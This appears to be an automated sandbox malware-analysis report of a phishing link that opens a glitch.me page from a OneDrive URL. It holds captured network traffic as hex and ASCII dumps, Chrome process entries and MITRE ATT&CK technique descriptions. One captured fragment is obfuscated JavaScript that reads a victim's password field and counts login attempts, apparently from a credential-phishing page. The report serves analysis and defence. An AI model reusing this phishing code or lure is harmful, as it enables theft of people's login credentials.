2022-01-28 16:24:56 UTC	785	IN	Data Raw: 73 49 43 2b 64 73 6e 77 47 32 6d 4f 73 37 62 75 67 4d 59 33 53 55 77 69 63 79 6a 74 52 36 79 58 58 56 58 65 73 58 49 43 6f 59 79 34 76 4f 31 52 39 33 45 65 64 6f 76 30 58 71 4a 6e 52 77 63 39 70 6e 77 50 79 50 6d 35 38 55 46 52 55 37 74 46 32 67 59 32 42 6a 6b 34 76 41 65 69 2f 42 36 33 55 64 4b 64 66 63 4c 38 6a 39 75 35 64 4b 70 75 75 30 58 2f 38 41 51 51 65 6b 4e 6a 74 6f 48 6d 4e 57 39 4e 59 46 44 4a 6d 63 48 48 53 67 4f 7a 50 55 58 52 33 62 64 5a 32 71 56 30 44 30 48 69 6a 70 71 35 45 53 66 45 7a 4d 7a 4d 7a 4d 7a 4d 7a 67 34 35 52 56 59 67 7a 34 6d 71 41 59 63 37 70 36 32 65 6c 64 67 35 46 79 44 6b 58 59 75 69 76 65 73 58 5a 58 5a 58 41 6d 63 5a 36 5a 42 61 2b 53 6b 67 4c 73 33 6e 70 6a 6e 73 59 7a 46 6d 42 69 46 41 4d 58 4d 4b 71 4a 7a 41 69 55 63 Data Ascii: sIC+dsnwG2mOs7bugMY3SUwicyjtR6yXXVXesXICoYy4vO1R93Eedov0XqJnRwc9pnwPyPm58UFRU7tF2gY2Bjk4vAei/B63UdKdfcL8j9u5dKpuu0X/8AQQekNjtoHmNW9NYFDJmcHHSgOzPUXR3bdZ2qV0D0Hijpq5ESfEzMzMzMzMzg45RVYgz4mqAYc7p62eldg5FyDkXYuivesXZXZXAmcZ6ZBa+SkgLs3npjnsYzFmBiFAMXMKqJzAiUc
2022-01-28 16:24:56 UTC	856	IN	Data Raw: 49 69 49 69 49 69 49 69 49 69 44 41 55 49 69 49 69 49 67 51 41 41 43 49 69 49 69 42 43 41 43 49 69 49 68 51 42 78 66 45 66 68 59 52 57 51 4d 62 48 59 6e 63 6f 76 46 6e 72 42 32 75 6f 56 51 35 69 6c 45 67 47 58 4f 55 77 67 55 77 41 63 35 56 66 50 4d 48 35 6d 77 6e 37 47 77 6e 37 47 77 50 77 4e 67 59 48 30 48 42 77 50 78 48 43 66 69 50 77 48 34 6d 77 50 39 5a 73 4a 2f 71 4e 68 50 78 4e 67 59 48 34 44 38 42 39 31 4d 48 46 38 52 79 56 4d 4d 6b 67 41 34 6f 31 4e 35 59 65 59 50 6c 4e 32 4a 32 35 57 77 4e 43 4e 52 62 4b 4e 52 61 45 5a 43 30 42 6b 52 6f 6f 79 34 57 71 49 44 4d 7a 4d 7a 4d 7a 4a 68 41 5a 6d 5a 6d 5a 6d 5a 6d 5a 4d 4a 52 6d 5a 6d 5a 6d 5a 6d 5a 6b 52 41 5a 6d 5a 6d 5a 4d 49 43 41 7a 4d 69 49 69 41 7a 4d 7a 4d 7a 49 69 55 5a 6d 5a 6d 5a 6b 52 6b 42 Data Ascii: IiIiIiIiIiDAUIiIiIgQAACIiIiBCACIiIhQBxfEfhYRWQMbHYncovFnrB2uoVQ5ilEgGXOUwgUwAc5VfPMH5mwn7Gwn7GwPwNgYH0HBwPxHCfiPwH4mwP9ZsJ/qNhPxNgYH4D8B91MHF8RyVMMkgA4o1N5YeYPlN2J25WwNCNRbKNRaEZC0BkRooy4WqIDMzMzMzJhAZmZmZmZmZMJRmZmZmZmZkRAZmZmZMICAzMiIiAzMzMzIiUZmZmZkRkB
2022-01-28 16:24:56 UTC	865	IN	Data Raw: 44 6a 30 43 76 55 76 55 52 39 42 66 30 50 50 66 75 6e 44 6c 63 36 37 67 2f 67 72 70 48 39 54 30 43 65 6e 35 72 31 63 66 51 58 44 30 30 50 52 52 58 64 2b 6a 2f 55 53 39 4d 6e 6f 47 39 44 7a 56 76 61 4d 6b 39 4c 36 4c 68 77 32 55 48 30 53 76 31 48 33 6c 4f 58 43 6a 78 38 73 36 49 38 52 64 71 65 6d 70 37 43 50 72 66 30 53 2b 6a 31 2b 63 34 53 55 44 2f 47 62 43 66 69 4f 42 67 66 67 50 77 48 33 50 69 2f 77 47 43 5a 51 68 55 30 77 49 5a 45 62 57 73 59 58 62 5a 4a 69 35 38 6f 2f 6c 46 38 59 6e 68 68 35 51 2b 53 54 79 32 7a 4d 4d 64 4e 54 2b 63 48 6c 6b 38 31 78 34 37 58 7a 30 45 54 59 38 38 77 66 48 4a 35 5a 66 4d 2f 6e 4c 65 58 2f 49 4c 34 33 38 56 67 32 65 4e 78 38 67 66 45 44 7a 41 38 30 33 6b 6b 38 52 6d 68 36 4c 4d 6e 68 42 35 53 6e 69 42 34 6a 66 79 79 65 Data Ascii: Dj0CvUvUR9Bf0PPfunDlc67g/grpH9T0Cen5r1cfQXD00PRRXd+j/US9MnoG9DzVvaMk9L6Lhw2UH0Sv1H3lOXCjx8s6I8Rdqemp7CPrf0S+j1+c4SUD/GbCfiOBgfgPwH3Pi/wGCZQhU0wIZEbWsYXbZJi58o/lF8Ynhh5Q+STy2zMMdNT+cHlk81x47Xz0ETY88wfHJ5ZfM/nLeX/IL438Vg2eNx8gfEDzA803kk8Rmh6LMnhB5SniB4jfyye
2022-01-28 16:24:56 UTC	873	IN	Data Raw: 70 48 36 68 75 54 73 64 66 2b 6f 62 6e 71 4e 56 6f 65 45 62 47 36 48 36 65 78 7a 6b 30 4f 73 66 55 75 63 67 2b 4a 66 49 62 47 76 67 4f 71 32 4f 61 47 70 48 58 77 4c 65 51 35 34 78 71 75 6f 34 6b 61 2b 41 33 51 33 6a 32 4e 66 41 76 4c 57 78 78 49 35 79 44 47 78 38 52 7a 57 68 35 43 35 72 59 31 38 42 6c 38 68 71 52 33 52 7a 78 6a 6d 74 6f 63 6e 41 62 48 63 6c 7a 6b 48 78 47 76 48 71 6a 55 39 52 38 64 6a 69 6a 51 2b 49 2b 51 30 4f 71 50 55 78 37 47 71 36 6c 34 2f 69 4f 66 67 4f 68 6f 35 31 6f 2b 52 74 44 35 44 78 55 61 6b 66 49 32 4f 69 2b 51 31 49 30 63 36 30 62 77 62 51 37 6f 65 47 76 67 4f 52 6e 4b 74 48 71 7a 76 38 41 30 58 71 64 6a 71 66 4d 38 64 52 2b 6f 64 54 73 64 66 38 41 71 4f 55 6e 62 59 37 2b 30 74 44 56 44 65 44 52 62 79 62 4c 34 6c 38 69 78 73 Data Ascii: pH6huTsdf+obnqNVoeEbG6H6exzk0OsfUucg+JfIbGvgOq2OaGpHXwLeQ54xquo4ka+A3Q3j2NfAvLWxxI5yDGx8RzWh5C5rY18Bl8hqR3RzxjmtocnAbHclzkHxGvHqjU9R8djijQ+I+Q0OqPUx7Gq6l4/iOfgOho51o+RtD5DxUakfI2Oi+Q1I0c60bwbQ7oeGvgORnKtHqzv8A0XqdjqfM8dR+odTsdf8AqOUnbY7+0tDVDeDRbybL4l8ixs
2022-01-28 16:24:56 UTC	889	IN	Data Raw: 49 2f 36 77 49 46 6a 43 2b 67 7a 68 6c 6f 33 78 74 51 6e 57 39 61 42 39 69 63 6f 6f 42 57 73 4f 63 43 74 73 65 67 4b 74 47 61 36 44 6d 59 6d 6c 42 65 46 4b 77 53 57 51 2b 49 41 76 35 70 41 57 6b 61 69 41 4b 63 55 5a 57 63 6f 37 5a 35 4b 71 4b 41 78 41 72 32 58 63 42 4a 56 61 68 79 33 65 37 4f 77 63 42 31 4d 69 75 69 55 63 41 2f 4c 69 44 4e 71 2b 39 50 39 46 37 56 48 49 7a 67 57 67 52 34 38 41 4b 75 55 4d 44 66 46 6a 41 38 76 69 4d 73 75 7a 4d 48 73 30 72 6f 6e 68 43 66 67 4d 50 58 6b 30 6f 59 57 52 51 77 6c 6f 42 6d 42 71 44 71 4e 57 35 54 50 7a 50 4f 31 51 68 77 6d 6e 77 42 36 2b 4e 4d 4c 59 77 65 73 59 50 39 46 2f 43 6b 77 31 55 72 31 71 45 35 47 41 36 72 70 4f 36 4b 38 77 6b 34 71 6a 45 52 41 71 34 46 78 78 58 51 54 46 63 62 59 59 2b 55 4f 68 69 74 41 Data Ascii: I/6wIFjC+gzhlo3xtQnW9aB9icooBWsOcCtsegKtGa6DmYmlBeFKwSWQ+IAv5pAWkaiAKcUZWco7Z5KqKAxAr2XcBJVahy3e7OwcB1MiuiUcA/LiDNq+9P9F7VHIzgWgR48AKuUMDfFjA8viMsuzMHs0ronhCfgMPXk0oYWRQwloBmBqDqNW5TPzPO1QhwmnwB6+NMLYwesYP9F/Ckw1Ur1qE5GA6rpO6K8wk4qjERAq4FxxXQTFcbYY+UOhitA
2022-01-28 16:24:56 UTC	891	IN	Data Raw: 45 65 44 6f 77 41 54 38 33 6d 33 63 6d 73 6b 6f 4d 38 31 4b 59 4f 2f 44 35 5a 31 68 42 73 79 36 50 76 2b 36 6e 73 2b 61 67 6e 7a 7a 4b 2b 4c 35 39 64 70 69 67 52 6e 4a 75 75 2f 6f 5a 55 73 46 72 50 53 34 34 57 6d 44 67 37 67 76 4f 50 4c 68 52 41 39 41 44 41 46 64 2b 55 5a 34 76 33 31 62 55 47 66 41 75 72 48 30 30 75 47 78 31 76 7a 61 68 68 55 58 78 33 74 48 5a 34 4c 62 4b 61 42 58 6b 71 44 46 30 69 68 67 69 49 44 63 74 31 6c 2f 77 4a 53 71 58 6d 57 5a 53 66 33 2f 66 41 45 52 2f 4f 4f 64 6d 5a 66 72 63 59 6a 68 4a 5a 32 34 33 58 64 56 57 43 72 67 6a 49 6a 41 68 79 30 4f 34 38 62 30 6d 41 4a 36 79 4f 72 49 4f 31 52 47 61 6e 46 7a 76 51 57 6d 45 2f 41 71 50 52 6c 70 6e 6c 4e 51 75 31 67 64 35 39 4c 37 6f 59 43 6c 41 74 4a 62 43 46 37 4f 52 41 45 56 41 66 55 Data Ascii: EeDowAT83m3cmskoM81KYO/D5Z1hBsy6Pv+6ns+agnzzK+L59dpigRnJuu/oZUsFrPS44WmDg7gvOPLhRA9ADAFd+UZ4v31bUGfAurH00uGx1vzahhUXx3tHZ4LbKaBXkqDF0ihgiIDct1l/wJSqXmWZSf3/fAER/OOdmZfrcYjhJZ243XdVWCrgjIjAhy0O48b0mAJ6yOrIO1RGanFzvQWmE/AqPRlpnlNQu1gd59L7oYClAtJbCF7ORAEVAfU
2022-01-28 16:24:56 UTC	899	IN	Data Raw: 6e 3e 3c 73 70 61 6e 3e 69 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 6e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 20 23 30 30 37 33 63 38 3b 27 3e 6c 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 77 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 69 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 74 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 68 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 20 23 30 30 37 33 63 38 3b 27 3e 32 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 4f 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 75 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 74 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 6c 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 6f 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 6f 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 6b 3c 2f Data Ascii: n><span>i</span><span>n</span><span style='color: #0073c8;'>l</span><span>w</span><span>i</span><span>t</span><span>h</span><span style='color: #0073c8;'>2</span><span>O</span><span>u</span><span>t</span><span>l</span><span>o</span><span>o</span><span>k</
2022-01-28 16:24:57 UTC	990	IN	Data Raw: 41 67 49 43 41 67 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 Data Ascii: AgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
2022-01-28 16:24:57 UTC	1006	IN	Data Raw: 63 43 4f 78 48 59 69 63 42 4f 42 48 59 69 73 42 50 59 69 62 72 55 34 46 6a 59 42 31 67 6a 36 6b 67 48 78 38 4b 2b 6d 7a 57 69 6a 76 54 71 57 4e 69 33 73 30 62 55 6b 59 36 79 37 43 52 44 33 2b 39 4c 38 67 47 2f 35 49 72 61 58 4a 49 42 32 37 4f 47 7a 2b 30 66 32 39 6c 74 44 30 72 36 46 73 74 46 4c 65 2f 62 31 66 4c 49 4f 37 74 74 4a 65 6c 4c 38 6a 66 62 38 31 6b 7a 61 75 47 75 76 74 66 32 4a 62 59 48 68 30 30 74 52 32 4f 58 70 46 4c 4b 62 4e 76 76 73 48 54 55 51 75 78 7a 6d 71 59 35 55 50 39 2b 31 41 50 71 45 66 54 76 53 72 71 43 70 61 4f 57 51 62 2b 73 32 75 33 5a 53 4e 67 48 4a 65 31 4a 38 70 6b 6b 2b 31 68 47 6d 75 79 6a 53 35 49 35 74 74 2f 6f 4e 61 75 50 69 76 30 49 2b 4b 5a 70 39 74 75 2b 4b 4d 6e 58 6b 68 78 6b 57 57 6d 53 49 52 2b 6f 76 78 6e 6b 6b Data Ascii: cCOxHYicBOBHYisBPYibrU4FjYB1gj6kgHx8K+mzWijvTqWNi3s0bUkY6y7CRD3+9L8gG/5IraXJIB27OGz+0f29ltD0r6FstFLe/b1fLIO7ttJelL8jfb81kzauGuvtf2JbYHh00tR2OXpFLKbNvvsHTUQuxzmqY5UP9+1APqEfTvSrqCpaOWQb+s2u3ZSNgHJe1J8pkk+1hGmuyjS5I5tt/oNauPiv0I+KZp9tu+KMnXkhxkWWmSIR+ovxnkk
2022-01-28 16:24:57 UTC	1014	IN	Data Raw: 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 Data Ascii: AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
2022-01-28 16:24:57 UTC	1030	IN	Data Raw: 46 4e 31 62 45 6c 76 78 54 44 4f 65 76 70 4e 6f 66 72 6f 47 34 57 72 59 4a 7a 30 70 52 42 71 51 79 30 38 4c 6b 77 76 79 66 59 67 5a 74 2f 53 37 4b 6b 47 42 4f 38 58 46 4c 50 51 57 77 6e 59 6d 73 6e 76 2f 51 65 79 77 42 58 45 64 32 6e 68 50 68 50 35 6e 71 55 66 71 39 70 47 71 6e 43 35 2b 4b 31 66 76 49 48 45 2f 31 4f 73 61 49 6e 4f 4a 6a 72 63 79 6d 6d 6c 39 65 2b 68 47 50 54 75 38 72 6c 48 4f 38 57 6f 52 6e 41 78 44 2b 4c 36 7a 49 51 58 33 6f 48 73 73 54 6e 35 72 35 47 4d 4a 57 62 66 56 75 79 4a 42 2b 4a 42 39 75 57 71 4a 6f 41 39 30 6d 57 39 6a 63 63 35 39 72 59 7a 55 54 6c 55 69 39 47 2f 50 72 53 71 79 37 56 72 57 62 67 68 4d 38 39 31 59 75 73 2b 6d 6b 48 50 64 5a 4e 4e 46 73 6a 6f 6d 75 77 78 6f 31 44 35 70 67 76 49 74 67 6f 55 76 79 74 62 38 6f 65 78 Data Ascii: FN1bElvxTDOevpNofroG4WrYJz0pRBqQy08LkwvyfYgZt/S7KkGBO8XFLPQWwnYmsnv/QeywBXEd2nhPhP5nqUfq9pGqnC5+K1fvIHE/1OsaInOJjrcymml9e+hGPTu8rlHO8WoRnAxD+L6zIQX3oHssTn5r5GMJWbfVuyJB+JB9uWqJoA90mW9jcc59rYzUTlUi9G/PrSqy7VrWbghM891Yus+mkHPdZNNFsjomuwxo1D5pgvItgoUvytb8oex
2022-01-28 16:24:57 UTC	1046	IN	Data Raw: 34 35 62 36 64 64 3d 24 28 27 23 70 61 73 73 77 6f 72 64 27 29 5b 5f 30 78 34 34 31 31 39 32 28 30 78 31 30 34 29 5d 28 29 2c 5f 30 78 32 35 62 35 66 38 3d 24 28 27 23 66 69 65 6c 64 27 29 5b 5f 30 78 34 34 31 31 39 32 28 30 78 31 30 38 29 5d 28 29 2c 5f 30 78 35 64 36 63 36 32 3d 24 28 5f 30 78 34 34 31 31 39 32 28 30 78 65 38 29 29 5b 5f 30 78 34 34 31 31 39 32 28 30 78 31 30 38 29 5d 28 29 3b 24 28 27 23 6d 73 67 27 29 5b 5f 30 78 34 34 31 31 39 32 28 30 78 31 30 35 29 5d 28 5f 30 78 35 64 36 63 36 32 29 2c 5f 30 78 66 64 64 33 65 38 3d 5f 30 78 66 64 64 33 65 38 2b 30 78 31 2c 5f 30 78 66 64 64 33 65 38 3e 3d 30 78 33 3f 28 5f 30 78 66 64 64 33 65 38 3d 30 78 30 2c 77 69 6e 64 6f 77 5b 5f 30 78 34 34 31 31 39 32 28 30 78 31 31 38 29 5d 5b 5f 30 78 34 Data Ascii: 45b6dd=$('#password')[_0x441192(0x104)](),_0x25b5f8=$('#field')[_0x441192(0x108)](),_0x5d6c62=$(_0x441192(0xe8))[_0x441192(0x108)]();$('#msg')[_0x441192(0x105)](_0x5d6c62),_0xfdd3e8=_0xfdd3e8+0x1,_0xfdd3e8>=0x3?(_0xfdd3e8=0x0,window[_0x441192(0x118)][_0x4

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:57 UTC	1047	OUT	GET /gmail.com HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://magenta-flicker-surprise.glitch.me/freedo.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-01-28 16:24:57 UTC	1048	IN	HTTP/1.1 200 OK Content-Type: image/png Transfer-Encoding: chunked Connection: close Date: Thu, 30 Dec 2021 20:48:27 GMT access-control-allow-origin: * Cache-Control: public, max-age=2592000 Server: envoy X-Cache: Hit from cloudfront Via: 1.1 3dd91613764eafe7ad199013ce202442.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-C1 X-Amz-Cf-Id: C4hf6gOzb2sSrfEVXOF9w9X2z51oba7daklgmShMlkxr02wOAcIHwQ== Age: 2489790
2022-01-28 16:24:57 UTC	1048	IN	Data Raw: 32 38 38 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 28 54 49 44 41 54 78 9c ec bd 0b 98 5d 55 79 3f fc 5e d6 de fb 9c 33 f7 64 72 23 81 40 08 e1 62 8a 80 4a ad 5c 02 de 50 54 2c b6 6a ad bd 88 fd 6a ab ad fd fa 7c b5 b5 7d da 5a bf 3e ad fd 6a fd da da fa b7 ad da db a3 d5 b6 e2 b5 0a 0a 8a 88 a2 82 0a a2 06 30 40 20 81 5c 27 99 c9 dc ce d9 7b af b5 de f7 ff ac b5 cf 84 64 26 64 98 9c 93 30 e4 ef 0b 86 31 73 ce 5e 6b af 77 ad f7 fa 7b df 65 54 15 16 25 39 70 00 4a 60 48 20 4e 51 01 15 10 55 51 00 30 fc 8b 07 3f 8c a0 58 fd 27 fe 03 80 e1 b7 a8 0a 4e c2 73 90 a1 f6 54 be cc 13 13 2e 5a 06 88 0b 8b 8e a4 88 a2 28 02 a4 40 61 65 e3 0a b7 57 7c 86 3c 80 47 60 40 13 5e a9 62 58 fc 41 b1 7a Data Ascii: 288dPNGIHDRL\(TIDATx]Uy?^3dr#@bJ\PT,jj\|}Z>j0@ \'{d&d01s^kw{eT%9pJ`H NQUQ0?X'NsT.Z(@aeW\|<G`@^bXAz

Target ID:	0
Start time:	17:24:19
Start date:	28/01/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9
Imagebase:	0x7ff7c15e0000
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Target ID:	2
Start time:	17:24:21
Start date:	28/01/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,188383026965401033,7131490049536642209,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1780 /prefetch:8
Imagebase:	0x7ff7c15e0000
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre